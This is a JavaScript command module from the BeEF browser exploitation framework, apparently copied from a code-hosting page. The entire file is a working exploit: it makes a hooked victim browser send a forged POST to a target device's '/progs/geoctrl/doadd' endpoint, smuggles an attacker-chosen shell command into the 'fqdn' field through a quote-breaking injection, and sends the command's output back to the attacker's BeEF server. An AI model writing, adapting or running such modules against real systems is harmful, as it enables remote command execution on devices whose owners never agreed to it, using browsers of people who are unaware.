38 lines
977 B
JavaScript
38 lines
977 B
JavaScript
//
|
|
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
beef.execute(function() {
|
|
|
|
var rhost = '<%= @rhost %>';
|
|
var rport = '<%= @rport %>';
|
|
var timeout = '<%= @timeout %>';
|
|
|
|
|
|
var path = '/progs/geoctrl/doadd';
|
|
var cmd = "<%= @cmd %>";
|
|
|
|
if (rhost.substring(0,5) == "https") {
|
|
rhost = rhost.replace("https://","")
|
|
protocol = "https"
|
|
}
|
|
else {
|
|
rhost = rhost.replace("http://","")
|
|
protocol = "http"
|
|
}
|
|
|
|
|
|
beef.net.forge_request(protocol, "POST", rhost, rport, path, null, null, { fqdn: "' <%= @cmd %>'" }, 10, 'html', false, null, function(response) {
|
|
resp = response.headers+response.response_body;
|
|
start = resp.indexOf("Content-Type: text/html");
|
|
end = resp.indexOf("Cache-Control: no-cache");
|
|
final = resp.slice(start+23,end)
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, final)
|
|
});
|
|
|
|
|
|
|
|
});
|